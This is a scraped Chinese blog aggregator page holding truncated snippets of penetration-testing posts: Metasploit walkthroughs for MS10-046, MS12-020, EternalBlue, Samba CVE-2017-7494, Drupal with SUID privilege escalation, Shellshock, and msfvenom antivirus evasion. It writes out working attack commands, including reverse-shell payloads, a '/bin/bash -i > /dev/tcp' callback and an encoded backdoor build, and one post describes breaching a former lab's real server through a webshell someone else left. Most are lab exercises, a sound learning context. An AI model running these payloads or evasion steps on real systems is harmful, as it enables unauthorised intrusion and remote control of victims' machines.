msf

利用MSF渗透框架实现LNK文件快捷方式漏洞攻防

旧巷老猫 提交于 2020-01-26 10:28:21
利用MSF渗透框架实现LNK文件快捷方式漏洞攻防 实验环境: 攻击机:kali Linux 靶机:Windows 2007 / Windows xp 1、打开kali Linux,通过命令行打开msf: 2、通过search ms10-046 #查询漏洞模块 3、通过use exploit/windows/browser/ms10_046_shortcut_icon_dllloader #进入漏洞模块 4、设置payload连接受害机,反弹一个连接回来到kali linux: set payload windows/meterpreter/reverse_tcp 5、设置攻击者也就是kali Linux的ip和反弹连接回来的IP地址: set srvhost kali Linux的ip #设置攻击者ip set lhost 攻击机的(因为反弹回来到自己的机器上来) #设置反弹回来的ip地址即kali Linux 其他参数默认。 6、执行攻击生成一个共享连接: 7、将共享链接复制下来,让受害机访问: 靶机界面(中途2003出现小插曲临时更换了2007但是不影响本次实验),出现了两个文件 攻击机界面此时可以看到反弹的回显信息了: 8、根据session -i #查看会话连接,后面可跟上数字,假设查看一条跟上1: 我们还可以根据 ps 这条命令查看它的进程:

kali Linux局域网渗透之win10

Deadly 提交于 2020-01-26 06:01:28
kali机:192.168.198.134 win10:192.168.198.1 我们先来查看下自己的IP地址 接着我们使用fping来扫描一下局域网内的所有IP fping -g IP/24 -->扫描局域网内所有IP 攻击正式开始 1.我们先用msfvenom来生成一个木马文件,它将在root目录生成一个名叫shell.exe文件 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.134 lport=5555 -f exe R > /root/shell.exe LHOST -->本地的IP地址 LPORT -->反向连接到主机的端口 R> -->木马生成的保存输出路径 2.打开msfconsole,键入以下代码 msf > use exploit/multi/handler -->设置模块 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -->设置payload为反向tcp连接 msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址 msf exploit(multi/handler) > set lport 5555 --

【tool】远控免杀专题文章-msfvenom隐藏的参数

末鹿安然 提交于 2020-01-24 22:04:49
本节目录如下: msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 常规参数 msfvenom所有参数 部分参数解读 -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64

DC1(msf drupal7+suid-find提权)

喜欢而已 提交于 2020-01-23 00:21:43
这边我们靶机是仅主机模式,IP是192.168.56.101,,直接上msf拿到shell, 不过payload要改一下 改成php/meterperter/bind_tcp 拿到shell了 ,采用交互式 python -c "import pty;pty.spawn('/bin/bash')" find / -type f -perm -u=s 2>/dev/null #find查看root find /var/www -exec "/bin/sh" \; # find提权 来源: https://www.cnblogs.com/kuaile1314/p/12229986.html

永恒之蓝msf下 ms17_010 (64位kali下安装wine32)

北城余情 提交于 2020-01-18 02:37:18
本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 ================================= 若kali为64位 windows为32 需要安装wine32 ,但64位的kali下无法apt-get install wine32 在执行exploit时会出现 : it looks like wine32 is missing, you should install it. multiarch needs to be enabled first. as root, please execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32" 按照上面的方法dpkg --add-architecture i386 && apt-get update && apt-get install wine32即可 ================================= 具体的步骤如下: kali系统下安装wine32: apt-get install wine32 用wine32执行cmd.exe wine cmd.exe

smb(ms17-010)远程命令执行之msf

亡梦爱人 提交于 2020-01-18 02:36:31
本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 具体的步骤如下: kali系统下安装wine32: apt-get install wine32 用wine32执行cmd.exe wine cmd.exe exit //退出 git clone下载其利用脚本: git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb cd Eternalblue-Doublepulsar-Metasploit/ cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb 启动msf,然后进行一系列设置: service postgresql start msfconsole search eternalblue use exploit/windows/smb/eternalblue

服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示

纵然是瞬间 提交于 2020-01-18 02:35:36
漏洞信息: 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 漏洞利用条件: 1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问 2. 共享文件拥有写入权限 3. 恶意攻击者需猜解Samba服务端共享目录的物理路径 满足以上条件时,由于Samba能够为选定的目录创建网络共享,当恶意的客户端连接上一个可写的共享目录时,通过上传恶意的链接库文件,使服务端程序加载并执行它,从而实现远程代码执行。根据服务器的情况,攻击者还有可能以root身份执 测试环境: 在docker下搭建测试环境 1.拉取镜像到本地 root@backlion-virtual-machine:/home/backlion# docker pull medicean/vulapps:s_samba_1 2.启动环境,并将虚拟的445端口映射到物理机的445端口上: root@backlion-virtual-machine:/home/backlion# docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1 3

利用MSF渗透测试框架实现蓝屏:

二次信任 提交于 2020-01-17 23:19:32
利用MSF渗透测试框架实现蓝屏: 实验环境: 攻击机:kali Linux 靶机:Windows 2007或Windows server 2003 1、进行nmap探测保证受害者开启远程桌面服务(RDU)(端口号:3389),也可以用计算机远程连接试一试。如: 探测结果: 2、进入攻击机——kali linux打开msfconsole 3、打开后进行漏洞模块扫描: search ms12-020 #如下图: 4、通过查询我们可以看到有几个模块,通过: use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #进入模块,语法结构:use 模块 我们通过:show options #查询模块里面的参数: set rhosts 受害者ip #设置受害者ip地址: rhosts #受害者ip rhport #目标端口 可以通过:show options #查询模块里面的参数设置好没 5、使用exploit开始攻击。可以看到靶机蓝屏: 来源: CSDN 作者: 长锐 链接: https://blog.csdn.net/qq_41397071/article/details/104023981

CVE-2014-6271漏洞复现

…衆ロ難τιáo~ 提交于 2020-01-16 16:41:27
0x00 前言 要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现 0x01 正文 这里直接使用别人弄好的docker,简单又方便 docker pull hmlio/vaas-cve-2014-6271 下载完成之后,开启docker docker run -d -p 80:80 hmlio/vaas-cve-2014-6271 访问目标页面 这里还需要知道一个路劲,直接dirb 这里接着对cgi-bin进行一个爆破 最后拿到目标 执行payload: curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.25.165/2333 0<&1 2>&1” http://192.168.25.178/cgi-bin/stats 这里不使用msf因为oscp 规定msf只能使用一次来着(我隐约记得) kali监听就行 来源: CSDN 作者: Bubble_zhu 链接: https://blog.csdn.net/qq_36869808/article/details/104005219

内网渗透(蚁剑+MSF)

江枫思渺然 提交于 2020-01-14 11:05:26
0x01 192.168.2.244 攻击 (1) 使用的是之前本科实验室的同学在 192.168.2.244/bigdata 上留的一句话木马 (2) 因为本人技术有限,只能采用上传后门的方式来拿到 shell ,好在蚁剑足已满足我上传木马的需求。在这一步只需要使用 msf 生成木马(使用 theFatRat 生成的木马稳定性不怎么滴,而且不能绕过火绒)。最后产生的木马效果最好如下: msf>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.4.215 LPORT=6227 -e x86/shikata_ga_nai -x IPradar5.exe -i 5 -f exe -o /root/Desktop/backdoor.exe -e x86/shikata_ga_nai 此步意为使用 shikata_ga_nai 的编码方式对攻击载荷进行重新编码,上文有讲 -x IPradar5.exe 此步意为将木马捆绑在指定的可执行程序模版上,此处为 IPradar5.exe -i 5 此处意为使用刚才设定的编码方式对目标进行 5 次编码(多次编码理论上来讲有助于免杀,但是也不一定,毕竟杀软不是白收费的,免杀技术飞速发展,新的免杀技术一出现就会被各大安全厂商盯上的。。。。) -f exe 此步意为指定 MSF 编码器输出格式为 exe